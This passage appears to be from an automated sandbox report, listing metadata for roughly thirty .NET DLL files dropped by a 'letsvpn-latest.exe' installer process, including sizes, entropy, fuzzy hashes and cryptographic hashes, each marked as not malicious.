                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.938915021718061
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:bLnfIWqrWKhqWOHlLf2KQcvBZ9G4oS+ShjmM6IGBkSzC:bDf4zq3b2KZBZcS+ST6nk5
                                                                                                                                                                                                  MD5:7A8C5FD63F340E3A954FC88935DAF382
                                                                                                                                                                                                  SHA1:0445BC7202F7210085C141CD98B48D25350A7FBA
                                                                                                                                                                                                  SHA-256:7A2A22676BFF819F0BE8D538581FB6532BE3C4E1B68C46D6F25338C2A2D1C200
                                                                                                                                                                                                  SHA-512:922CCE6D593A83B2BADF5D8F9AB5C3B2FA2DFE59FEA58CB4B374A49844061948F2277A41F185B0DB3895E468889AFEF40702DE193A8A7AB8BD941CCA16650B85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.706301164600095
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:zybU8ndrbbT9NWB2WLhqWOHlLf2KQcvBZ9FAbS+ShjmM6IGBkS5:zy5ndvWlq3b2KZBZiS+ST6nkG
                                                                                                                                                                                                  MD5:9B69D7A653CF321BF2236EC3D2D0989D
                                                                                                                                                                                                  SHA1:E0EACFC753D1B590D04FC2423D3712635BE34109
                                                                                                                                                                                                  SHA-256:A5968200CB47E3D2911656095C2A64684EF1B671DD1FCEAB6DF21E67CA167D02
                                                                                                                                                                                                  SHA-512:D8FBC56DCA9A18706E33BDED2A95CB5131D298C9039CC7D0CF30ABD490EA2084850E8558C778DAC5E47349250810ABAC531CC5CB00DA41D7C52D219BAD0BD168
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.92741421615125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Jna8WK1WchqWOHlLf2KQcvBZ9ehS+ShjmM6IGBkSi:Jna0Dq3b2KZBZyS+ST6nkh
                                                                                                                                                                                                  MD5:181B7B7DD03571FDBA1DB949008F3A27
                                                                                                                                                                                                  SHA1:0A2EC802959DD458243EDB23E1185522614649CF
                                                                                                                                                                                                  SHA-256:434085D54A52A6A04B59907392D29D335CD580C1D2ADE9B2D594E36F1BAEEB2D
                                                                                                                                                                                                  SHA-512:312C5F69C05D0B7BA98AE3434C7A07CFA7F016DC5B3E5C51A01AA1DFA569261E462F85D5393466A9CF2A59838696CAA5DAB42D72ED238553B2C5BB56E564246C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.8768271726692625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:sBSWITWEhqWOHlLf2KQcvBZ9eB/HTS+ShjmM6IGBkSC3:s6Jq3b2KZBZ6TS+ST6nkz
                                                                                                                                                                                                  MD5:09F7DC412A8BC2939DF58390A44EF397
                                                                                                                                                                                                  SHA1:8CF0D78B3E2D03393D6D3681E140B56F5539295D
                                                                                                                                                                                                  SHA-256:0168F05FB92421C3CBCDEB4E61CC018FBC970900DC0373AC89D2BBB8F3796738
                                                                                                                                                                                                  SHA-512:4CCF2E3AC7B5EDBEFB7E82044DF8890B022CE7270E348353D45C00A743EDA6F6C0513606E264D77892EC16A0A31CFC456575D95B8C394BC557F1E95DBB5A7855
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.980168973605658
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:o88cIIWNoWOhqWOHlLf2KQcvBZ9u6hJS+ShjmM6IGBkSpjR:o9cU0q3b2KZBZNS+ST6nkqR
                                                                                                                                                                                                  MD5:4AD043270CCF1EC848BA0D701F96707F
                                                                                                                                                                                                  SHA1:5DB514D9CBDD964A68C3DF3979DF1076D22F771F
                                                                                                                                                                                                  SHA-256:F37BE601E91F79D5950FD8CB00F78DE8219F62CC356DB811864670B5214E00DD
                                                                                                                                                                                                  SHA-512:B7DA1F79F8A92765FAFB9237EDC24878DD0CAB1AB94443B3DD0C1ED51346E9E602609C4D3AA1B17F2FFC57066259DBA075245ED47BBFAD5E4A2C348256AD54C1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24096
                                                                                                                                                                                                  Entropy (8bit):6.719377001772263
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:hkUwx9rm5go1fWKmmW6oqN5eWjaWShqWOHlLf2KQcvBZ9P/dS+ShjmM6IGBkS3:QrmoFmWdOSq3b2KZBZ7S+ST6nk4
                                                                                                                                                                                                  MD5:00C714EC354CEDC187475C1316951F60
                                                                                                                                                                                                  SHA1:A8FA0FCE113FC2ADBED50CA893B466C840B5511A
                                                                                                                                                                                                  SHA-256:FBA71B0BB6318887131D2035EB5FEBB666D1A9C912F64CDAAB3C5756D0BD34C9
                                                                                                                                                                                                  SHA-512:464B617EA3097BCB9D1F150B13535F8DAB7339AEE6F5766F5DC1641374E318186B17F284BEB9B7D2DFE2AA61385AE9DA243810ABB4A4E4B9049EED94D823C7B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20000
                                                                                                                                                                                                  Entropy (8bit):6.794822093017821
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:A09bOAghbsDCyVnVc3p/i2fBVlAO/BRU+psbC984vmJHrE1dtx66aI2sU52RWVs8:ZOAghbsDCyVnVc3p/i2fBVlAO/BRU+pC
                                                                                                                                                                                                  MD5:317087D59DC1AA7C2F85D251BA44FDE0
                                                                                                                                                                                                  SHA1:C68481D9CADB05F85BBC83759CFA0C4CE0EC3ADA
                                                                                                                                                                                                  SHA-256:F0AAACDBF06DC2075B5B55EF652632FB4EE2D247E504AE49BF8846AC00D9F49E
                                                                                                                                                                                                  SHA-512:4F2D76505B2C88CD979B3F75378E38403E6726CA0746F2AF61E339D68C7B929FAEEACF39474D4EA207E65AF9B447DA0B46FAD88EB81E2896B4AA4647F0352C6D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.941755352854446
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:A7W6RWVhqWOHlLf2KQcvBZ9w2S+ShjmM6IGBkSC:A5Qq3b2KZBZPS+ST6nkR
                                                                                                                                                                                                  MD5:1E176549D8AB37CFB2177838FBBFD694
                                                                                                                                                                                                  SHA1:E561378ABC1F3C58AEC49BA4F180C188AD26CACE
                                                                                                                                                                                                  SHA-256:2390DA3A0A8319FB8C40DC9882950D6A39C2DBA9FA6FD60FC7F1CAB9E2062C7D
                                                                                                                                                                                                  SHA-512:79AD35289C20A0B450856DE79A9B8880365144872423F9F8F3BAD9E41BA11DF0EB5E9297EFD7B7F95419D1541C3FB6E3EAEEB39BAE3B5F08DB3938D41C6B838B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.020454355357436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:SI5HeWFwTBsWZhqWOHlLf2KQcvBZ9nZbGNS+ShjmM6IGBkSG:SI5HFwTB5q3b2KZBZ7b6S+ST6nk9
                                                                                                                                                                                                  MD5:7CD6028BB33B9DBD396FD16F63BB286F
                                                                                                                                                                                                  SHA1:67F369E89650EA38D67EFE92BC030A1571742B3E
                                                                                                                                                                                                  SHA-256:C5729B2A7ACD4E422C0477D33109F160DC2460A1E7C8ACEC8DE74CEA8FC626EA
                                                                                                                                                                                                  SHA-512:1E3B6C031A8C6FA7287B72884FCD04CBF900E2B9E5CA169EB1C4FA2A3768A4A16F36203919A27F7F598680528BC994F3ED1774F695C8841E004D1679C09C146C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.990509022722697
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rAJpVWbfkBnWUhqWOHlLf2KQcvBZ9N3rUdS+ShjmM6IGBkS7Dub:rAJpWfkBFq3b2KZBZL4dS+ST6nkYm
                                                                                                                                                                                                  MD5:462D114ADD9F6759004A49340C7721F0
                                                                                                                                                                                                  SHA1:719E5912B3B628C885D94708749EB7D3C4154211
                                                                                                                                                                                                  SHA-256:BB23D792673D6AA61AC4C38DEF659625903E6B9CB3952B782D7AFF11EDA6F811
                                                                                                                                                                                                  SHA-512:3F759B32181C142C9E9C35F5768C635D1ADE6300A3C32FA5D3D4071FE55B0AF5A61195580C90182D87812212FB7BB89180868DE7D42AC492A8396ED28F88A7EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.6557613974263905
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Q8R71h7yzt94dHWFgQBVWeHWFyTBVWvhqWOHlLf2KQcvBZ96Nm1iS+ShjmM6IGBK:R1dyAqgQBfqyTByq3b2KZBZoAgS+ST6K
                                                                                                                                                                                                  MD5:E8C9792083B8F193EC43C3CEA6FB581E
                                                                                                                                                                                                  SHA1:B5EA61F6AEA7525652B3D998680721F2B2CAA1C0
                                                                                                                                                                                                  SHA-256:B9D8D6A7796FBD9AA4D99D21C43B317325E14647CE8CA03A211326094F8F0AE8
                                                                                                                                                                                                  SHA-512:8083B3A1082D7BBA28D0A5F91C1425CE7D60F25DAA6A4752ED75BCBE2A7546502E6A974656737AD82AFACD1F3CB79215EB5DE663910634BD856779497417C701
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20512
                                                                                                                                                                                                  Entropy (8bit):6.793591248884187
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:1psBljcZQIVI8CNwbcyMWs4oBOW9MWG4tBOW2hqWOHlLf2KQcvBZ9T+ujS+Shjmy:zsPMQMI8COYyi4oBNw4tByq3b2KZBZJ4
                                                                                                                                                                                                  MD5:F4DD591DD75552218041D7EBEF66A71D
                                                                                                                                                                                                  SHA1:B255B7C96C17360E588A8015624C0FF412E70C87
                                                                                                                                                                                                  SHA-256:777427A4657CB26C393E51794B549729DDDCA90B44B0DC3922826EC162DE55DF
                                                                                                                                                                                                  SHA-512:3BDB1B18A267C79DC5971A87D59DCE6E5B6DAA4B3B0C29F7BA75C05E744C82B0884F2CFF5771E58FCDFC1E7B74CA5B1C4A71D296039BB18503EF7FB969D660F2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.445252190247148
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:MbhigwLAuZtM66g/Id7WVXWOhqWOHlLf2KQcvBZ9uoS+ShjmM6IGBkS2:MbhzkKsfq3b2KZBZjS+ST6nkV
                                                                                                                                                                                                  MD5:3C8BB7E74003ADB157ED9DE3AEFDDA22
                                                                                                                                                                                                  SHA1:361D696A22BD3213EF0890618374B9258248001D
                                                                                                                                                                                                  SHA-256:105B44C610BA66582F8424FADABED94E3F1C75B5406D08FDFB949AFAF37ED9D6
                                                                                                                                                                                                  SHA-512:94531ADDEA34271A39AE2BC9FA73A8AEF518F84D884F4335AA2EC03E8EE7974556769E7E83E13B14F0B8FBEDFD7935C38CCB249C55EC6A588C8EB947F1A761B8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38432
                                                                                                                                                                                                  Entropy (8bit):6.157953366104177
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:AlM7Ke5/WBkyN1hCq3b2KZBZaS+ST6nkm:AlM7KuulLN3qKk/mA
                                                                                                                                                                                                  MD5:59A2081C8387D01F9E9B25D45F5E3912
                                                                                                                                                                                                  SHA1:C829687DC9236D0B311B08565D28A2D0B9B3DA94
                                                                                                                                                                                                  SHA-256:382FFAA544AC83787AB00D63B987C2B97D12A22DD3791D38059312634FB45F4B
                                                                                                                                                                                                  SHA-512:69F06C088E4318FCDE9C164E598AB1B2172546257256F12A50D7C03EE8CEEDA8FCC930FD395E196B1F8AC17171925129A0E7F52E20138A4D92536A6FB0A30E30
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.971970551537452
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:fUcX6W9aWHhqWOHlLf2KQcvBZ9/ctcS+ShjmM6IGBkSg:fUchNq3b2KZBZy6S+ST6nkH
                                                                                                                                                                                                  MD5:7F432B8CB1B9666E95B618CE152112ED
                                                                                                                                                                                                  SHA1:27E679D4F2C59C1ADEB47DBA513A9CAD4CDB4EBC
                                                                                                                                                                                                  SHA-256:61E8A2E9A723EE9F11E5EB31C1B6C34E74EC62CB31DDB2A6CC61EB3B356D3073
                                                                                                                                                                                                  SHA-512:ECE55941FAE54A0A4D9EA66A79CB420FF193C4B4158F46FC0E3B281277F007F2F983D20D975977BD26C636CD3DC654907CCA0F9894CFE5D4199C33840B75BC8A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42528
                                                                                                                                                                                                  Entropy (8bit):6.052173413564498
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:doBj7kS+8mjvHTeaWKs0Sd4eeVq3b2KZBZPLj0S+ST6nk/:APmb9WKs0Peew3qKO/mp
                                                                                                                                                                                                  MD5:347B1F63D4419C5C8C4C6555E925EB18
                                                                                                                                                                                                  SHA1:1523D3060F7D91E1A6227B0C4D02375B9E80CC14
                                                                                                                                                                                                  SHA-256:DC4A3D2211B84690BDCF1FDCF4A82DD08F0E2168BF7715E2AD3B200442C9C77C
                                                                                                                                                                                                  SHA-512:43369FAA4E1BA0C84BC3D0445BEA4AB9B0CC435E84E836DE826348434772BE83674FB30AB96DFB42180FF23381772A219CB688F01256339FF61FC74B49738C55
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.7932969552567215
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:MldtuO/q3p4YN5XYwWCfWxahqWOHlLf2KQcvBZ9uWKdS+ShjmM6IGBkSM:MlJSZBXY4I+q3b2KZBZH2S+ST6nkD
                                                                                                                                                                                                  MD5:2893F2AF6EE2C60B3F531B4956BF170F
                                                                                                                                                                                                  SHA1:43F0672691EAE2A6D986E4280F7635D0BBE396F0
                                                                                                                                                                                                  SHA-256:9658DD8AFFCF9017C1F290C3E484EAD20A4EAE85DDB3FFAA8F718C6189D18F31
                                                                                                                                                                                                  SHA-512:EF257A6B647405CD2675C1513E64AC5E537D8ACA4C9C9910476F730DA8839CD177A50B7A4575331BFF9E68A10DC77132800430011F5DFAD9FFF7CCE8E55825FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.998855723947473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LTI2pWPzW+hqWOHlLf2KQcvBZ9dfaxGS+ShjmM6IGBkSOu:LE33q3b2KZBZaxGS+ST6nkRu
                                                                                                                                                                                                  MD5:1EA2C6268DE97149C3B6F120A6E52B83
                                                                                                                                                                                                  SHA1:6438DA3D482FE874ADEC765AA9624A540D5DB686
                                                                                                                                                                                                  SHA-256:A240D7B8C60B82A75F54E418FFABED591A35282D09CEFAF4DEC3AE5264D9F71F
                                                                                                                                                                                                  SHA-512:C7C6DDD2E225249DF5A4E8D6A99857E5402E5526BEE9FCF35A18D6A430BFCEC280570BFDB5D3CAC1E53EC35A6B64CD3965F948AC01347077007B4177F666CA38
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.01043644984067
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+cezoy4W04WOmhqWOHlLf2KQcvBZ9+LS+ShjmM6IGBkSIh:+Bzoy+jq3b2KZBZoS+ST6nkzh
                                                                                                                                                                                                  MD5:9D3DD05A7105339169ADDE890C88AC83
                                                                                                                                                                                                  SHA1:9F6BD6BFA1ED1D82F96EC1F418880F2662E9DC7D
                                                                                                                                                                                                  SHA-256:ACA4ED3642A63D01A20C168BF8ED9F6CC08B6385D5219C5948BBB60B75C7DB2F
                                                                                                                                                                                                  SHA-512:DF88BA3D85F09D7DE7212707C1E3F3916794F76312061C69AEA4F14C3DED36525A6824A4AAFD6CCECE737860921B8D7F29286D445AA749B3D8331D3ECE217D93
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.76183219276718
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:HyBGXZp94Yi06W82W8hqWOHlLf2KQcvBZ9VI3UZS+ShjmM6IGBkSQD:emZp9ZwMq3b2KZBZ8aS+ST6nkv
                                                                                                                                                                                                  MD5:68B46F5451304425F315AFF4154D34C6
                                                                                                                                                                                                  SHA1:E1C2B91BC255A40BD4116EDB17BF967014D4648A
                                                                                                                                                                                                  SHA-256:70CC659047E6231809038FD239AA3C04748959DE3970515D7E32469F8CC9B136
                                                                                                                                                                                                  SHA-512:67927FE36F3286AD517990179E9F107F0EC8CE26D66BD2ADF0B712FA01D30C69EA7DAE67E8E660B3381825939E5155297E668577F2282429EBCDB6163D755D7D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.912984335281838
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:1H/JWKpWphqWOHlLf2KQcvBZ95NS+ShjmM6IGBkSY:1H/jEq3b2KZBZBS+ST6nkv
                                                                                                                                                                                                  MD5:BF8033D65A2C318D533909CAA8EB3270
                                                                                                                                                                                                  SHA1:A1367CCEA0575FC7E6AED5892389359F222AC358
                                                                                                                                                                                                  SHA-256:FDC059C9E4746A88925168F89011C30BC1FE4F36A8B2039AD94042ED9DA5F5D7
                                                                                                                                                                                                  SHA-512:12FC27E9BC76245972F599264549126D8A7692EC1C1F72ACFB3C6596D9A90981DE04C1446CBA3E5DB4F7855E2AF0A6915C6CE42822284BC67EE1F807AC6475E6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.828657815336929
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:J4YlS5PWAb6jDW5hqWOHlLf2KQcvBZ9M2S+ShjmM6IGBkSss:JmY+q3b2KZBZLS+ST6nkxs
                                                                                                                                                                                                  MD5:56A6C05FF05053C5215402E40EE616D4
                                                                                                                                                                                                  SHA1:785AF2FD4E16AFF0C51C22A8AE993C6A55AD693D
                                                                                                                                                                                                  SHA-256:D62B71BDFA516FC9E01D872B293F6388F4E6F9D297DBFD68C6B345ED8BC21C52
                                                                                                                                                                                                  SHA-512:D6B49C38D7ACDCEE2FC7C04326C73E6806FE2F87E5E2FC4565EA20F469C95E7F4464058342F1CD09B6FB63BC6BDBD16B11CB6A4CC4346250F675AFAD1BD5811D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18464
                                                                                                                                                                                                  Entropy (8bit):6.860394751504702
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ITjbocNsWMhW2hqWOHlLf2KQcvBZ9F7S+ShjmM6IGBkSsrR:cboYyJq3b2KZBZjS+ST6nkhR
                                                                                                                                                                                                  MD5:0E4AFDD81561BB3250CE3A82745D0A06
                                                                                                                                                                                                  SHA1:B2152832A8329C9946FA76AEBBB640C00CC30F65
                                                                                                                                                                                                  SHA-256:0F61A4928C67EA462B906F899CCE93A800274C6293A5806AB423BDC409F827F7
                                                                                                                                                                                                  SHA-512:5091F12DAE47557EEA47956EAFE1246EAF703136D232EC14E20E383E57D261386F6CDCD453E5A4DDAE0F3883B0434141ED0E27AB82047372AD3B1042A87720E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):52256
                                                                                                                                                                                                  Entropy (8bit):5.867121098890678
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:tszrvuWznnuJlMeEM8Hy8d4Vx50lAhDVC+mq3b2KZBZcaS+ST6nksL:tgrvuqcP8RE5tQ+J3qKH/mqL
                                                                                                                                                                                                  MD5:438EA6C5B869E778CD9B96D37A827BBF
                                                                                                                                                                                                  SHA1:2F12F7ECC47EF9C2BD899811343BD49BE1AC74DA
                                                                                                                                                                                                  SHA-256:1A64B14FB86A517CBB62319543BBB2BE415B5FFF7E52FC356BAEB5E549267F38
                                                                                                                                                                                                  SHA-512:5E0E170DBE2AF3BE6B975EE33D87E8C26097A8C4F722EEAD41EE8F7815D29B17DD845B8BA2AD1FC85D6963D7EFBD950B646770465E5F37F04D90416301207844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30240
                                                                                                                                                                                                  Entropy (8bit):6.439683136275158
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:T47XzsCggQsW7Sl8xjP/QZsq3b2KZBZQS+ST6nkt:k7XgpRxb/kn3qKe/m3
                                                                                                                                                                                                  MD5:4E6698EF08CFF72D265F37D91F40B32F
                                                                                                                                                                                                  SHA1:4C3FD998F328AA109C8F06DA48233A0E97BBF140
                                                                                                                                                                                                  SHA-256:B668AFE067181342CDE9BCE756D559DBB89A77CF57C6D43248209F9D5B9E5123
                                                                                                                                                                                                  SHA-512:CE2BB74A70875A97372859C6D857898217747C180B546439958C0B3DF0C525CE1857D4942590CAEDDA4E06A1C7BD8BD24E17422E07CDF2D87285D878BDE9175E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21024
                                                                                                                                                                                                  Entropy (8bit):6.817500254068075
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rEwo6eTs14YY4cWpOWqhqWOHlLf2KQcvBZ9tm9dZS+ShjmM6IGBkSlp:AwDdT+q3b2KZBZcS+ST6nkYp
                                                                                                                                                                                                  MD5:593DCCB65E6B3FA04C7BAF70468FB246
                                                                                                                                                                                                  SHA1:604295C9FCE17F74C615F01099F299B893DC578A
